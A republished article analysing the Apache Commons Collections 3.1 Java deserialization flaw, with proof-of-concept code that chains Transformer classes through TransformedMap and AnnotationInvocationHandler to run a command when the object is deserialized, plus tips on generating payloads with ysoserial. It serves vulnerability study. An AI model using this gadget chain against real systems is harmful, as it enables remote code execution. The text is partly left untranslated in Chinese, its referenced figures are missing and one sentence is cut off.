Shulou(Shulou.com)05/31 Report--

This article shows you an example analysis of Apache Commons deserialization vulnerabilities. The content is concise and easy to understand. It will definitely make you shine. I hope you can gain something from the detailed introduction of this article.

I. Introduction

Although there are many articles on the web analyzing the deserialization vulnerability of this component, it is worth noting here. After all, this is significant for the development of Java deserialization vulnerabilities.

Apache Commons Collections is a very common tool library in Java application development. It adds many powerful data structures and simplifies the development of Java applications. It has become an accepted standard for Java to handle collection data. Many common applications such as Weblogic, WebSphere, Jboss, Jenkins, etc. use the Apache Commons Collections toolkit, and when the toolkit has a deserialization vulnerability, these applications are also affected, which is why the deserialization vulnerability is so serious.

II. Test environment

jdk1.7.0_21 + commons-collections-3.1.jar

Apache Commons Collections component history version download address: http://archive.apache.org/dist/commons/collections/binaries/, or use maven dependency:

commons-collections

commons-collections

3.1

The payload of this component has been integrated into the Java deserialization exploit tool yserials (https://github.com/frohoff/yserials); during penetration testing, you only need to find the entry point of Java deserialization according to the characteristics of Java serialized data (data starting with rO0AB in hexadecimal actioned or base64 encoding format), and guess that there may be CommonsCollections components according to Web applications. Then you can directly use the yserials tool to generate payloads for exploitation.

III. Vulnerability Analysis

Here we examine a chain of code execution exploits that exploit the Transformer interface and several class constructs that implement it.

Transformer interface

The Transformer interface is very simple to define, defining only a transform() method, according to the documentation, this method is mainly used for object transformation. There are quite a few classes to implement this interface. Here, we mainly use the following three implementation classes: ConstantTransformer, InvokerTransformer and ChainedTransformer.

package org.apache.commons.collections;public interface Transformer { //object conversion public Object transform(Object input);}ChainedTransformer class

ChainedTransformer class defines a Transformer[] array, and when implementing the transform() method, it strings multiple Transformer objects by traversing the array elements in turn and calling the transform() method of the Transformer implementation class corresponding to the array elements.

public class ChainedTransformer implements Transformer, Serializable { private final Transformer[] iTransformers; ... public ChainedTransformer(Transformer[] transformers) { super(); iTransformers = transformers; } public Object transform(Object object) { for (int i = 0; i

< iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object; } ...}InvokerTransformer类 InvokerTransformer类的transform()方法主要通过反射机制调用传入参数对象的某个方法，只需在构造InvokerTransformer对象的时候设置方法名、参数类型和参数值即可。 public class InvokerTransformer implements Transformer, Serializable { /** The method name to call */ private final String iMethodName; /** The array of reflection parameter types */ private final Class[] iParamTypes; /** The array of reflection arguments */ private final Object[] iArgs; ... public InvokerTransformer(String methodName, Class[] paramTypes, Object[] args) { super(); iMethodName = methodName; iParamTypes = paramTypes; iArgs = args; } //简化后的transform()方法，通过反射机制调用对象的方法 public Object transform(Object input) { ... Class cls = input.getClass(); Method method = cls.getMethod(iMethodName, iParamTypes); return method.invoke(input, iArgs); ... }}ConstantTransformer类 ConstantTransformer类十分简单，直接返回传入对象。 public class ConstantTransformer implements Transformer, Serializable { private final Object iConstant; ... public ConstantTransformer(Object constantToReturn) { super(); iConstant = constantToReturn; } public Object transform(Object input) { return iConstant; } ...} 根据上述情况，我们的目标是构造Runtime.getRuntime().exec()代码执行。很明显，我们需要借助InvokerTransformer类中transform()方法实现反射调用。如下所示，这里即是代码执行的源头： package orz.vuln.poc;import org.apache.commons.collections.functors.InvokerTransformer;public class CommonsCollections { public static void main(String[] args) throws Exception { //通过InvokeTransformer类反射调用Runtime代码 InvokerTransformer invoker1 = new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class}, new Object[] {"getRuntime", null}); InvokerTransformer invoker2 = new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class}, new Object[] {null, null}); InvokerTransformer invoker3 = new InvokerTransformer("exec", new Class[] {String.class}, new Object[] {"calc.exe"}); invoker3.transform(invoker2.transform(invoker1.transform(Runtime.class))); /*正常反射调用Runtime代码 Class clazz = Runtime.class; Method m1 = clazz.getMethod("getRuntime", null); Method m2 = clazz.getMethod("exec", String.class); m2.invoke(m1.invoke(clazz, null), "calc.exe"); */ }} 更进一步，我们发现可以借助ChainedTransformer类中的transform()方法代替invoker3.transform(invoker2.transform(invoker1.transform(Runtime.class)))，即将上述多个InvokerTransformer对象初始化为Transformer[]数组，并且用Runtime.class初始化ConstantTransformer类对象，这样，就能构造出一条使用任意对象即可触发代码执行的Transformer调用链： package orz.vuln.poc;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;public class CommonsCollections { public static void main(String[] args) throws Exception { Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class}, new Object[] {"getRuntime", null}), new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class}, new Object[] {null, null}), new InvokerTransformer("exec", new Class[] {String.class}, new Object[] {"calc.exe"}) }; Transformer chainedTransformer = new ChainedTransformer(transformers); chainedTransformer.transform("foo"); }} 接下来，我们希望通过反序列化触发调用Transformer对象transform()方法，达到代码执行的目的。 TransformedMap类 Apache Commons Collections中定义了一个TransformedMap类用来对Map进行某种变换，该类通过调用decorate()方法进行实例化，如下所示： 并且在该类中还有个checkSetValue()方法，在该方法中实现了调用Transformer对象的transform()方法；根据该方法描述，checkSetValue()方法将在setValue()方法调用的时候被调用： 因此，我们的思路是通过利用Map对象和构造的恶意Transformer对象初始化TransformedMap对象，再调用setValue()方法修改Map对象的值，代码如下： package orz.vuln.poc;import java.util.HashMap;import java.util.Map;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;public class CommonsCollections { public static void main(String[] args) throws Exception { Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class}, new Object[] {"getRuntime", null}), new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class}, new Object[] {null, null}), new InvokerTransformer("exec", new Class[] {String.class}, new Object[] {"calc.exe"}) }; Transformer chainedTransformer = new ChainedTransformer(transformers); //chainedTransformer.transform("foo"); Map map = new HashMap(); map.put("foo", "bar"); Map transformedMap = TransformedMap.decorate(map, null, chainedTransformer); Map.Entry entry = (Map.Entry)transformedMap.entrySet().iterator().next(); entry.setValue("test"); }} 继续寻找通过反序列化触发setValue()方法执行的地方，最后在AnnotationInvocationHandler类的readObject()方法中找到了。 AnnotationInvocationHandler类 AnnotationInvocationHandler类的readObject()方法如下所示： 由于该类不提供公开的构造方法进行初始化，所以，我们通过反射调用该类的构造方法，并使用恶意的TransformedMap对象进行初始化，就可以生成攻击payload。这里有个判断条件需要满足才能最终执行entry.setValue()方法，即

According to the code traceability, the jazz variable is an attribute value of an annotation subclass object. If the jazz variable is not null, str needs to be an attribute of the annotation class we use in Class jazz =map.get(str); in the exploit code, we use java.lang.annotation.Target annotation, which has only one attribute value, so we need to ensure that the key value is value when mapping.put().

Finally, the full exploit code is as follows:

package orz.vuln.poc;import java.io.FileInputStream;import java.io.FileOutputStream;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import java.lang.annotation.Target;import java.lang.reflect.Constructor;import java.util.HashMap;import java.util.Map;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections.functors.ConstantTransformer;import org.apache.commons.collections.functors.InvokerTransformer;import org.apache.commons.collections.map.TransformedMap;public class CommonsCollections { public static void main(String[] args) throws Exception { Transformer[] transformers = new Transformer[] { new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class}, new Object[] {"getRuntime", null}), new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class}, new Object[] {null, null}), new InvokerTransformer("exec", new Class[] {String.class}, new Object[] {"calc.exe"}) }; Transformer chainedTransformer = new ChainedTransformer(transformers); //chainedTransformer.transform("foo"); Map map = new HashMap(); map.put("value", "bar");//since java.lang.annotation.Target is used, the key value here must be value Map transformedMap = TransformedMap.decorate(map, null, chainedTransformer); //Map.Entry entry = (Map.Entry)transformedMap.entrySet().iterator().next(); //entry.setValue("test"); Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler"); Constructor ctor = clazz.getDeclaredConstructor(Class.class, Map.class); ctor.setAccessible(true); Object instance = ctor.newInstance(Target.class, transformedMap); FileOutputStream fos = new FileOutputStream("D:/commonscollections.ser"); ObjectOutputStream oos = new ObjectOutputStream(fos); oos.writeObject(instance); oos.close(); fos.close(); FileInputStream fis = new FileInputStream("D:/commonscollections.ser"); ObjectInputStream ois = new ObjectInputStream(fis); ois.readObject(); ois.close(); fis.close(); }} The above is an example analysis of Apache Commons deserialization vulnerabilities. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserves, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.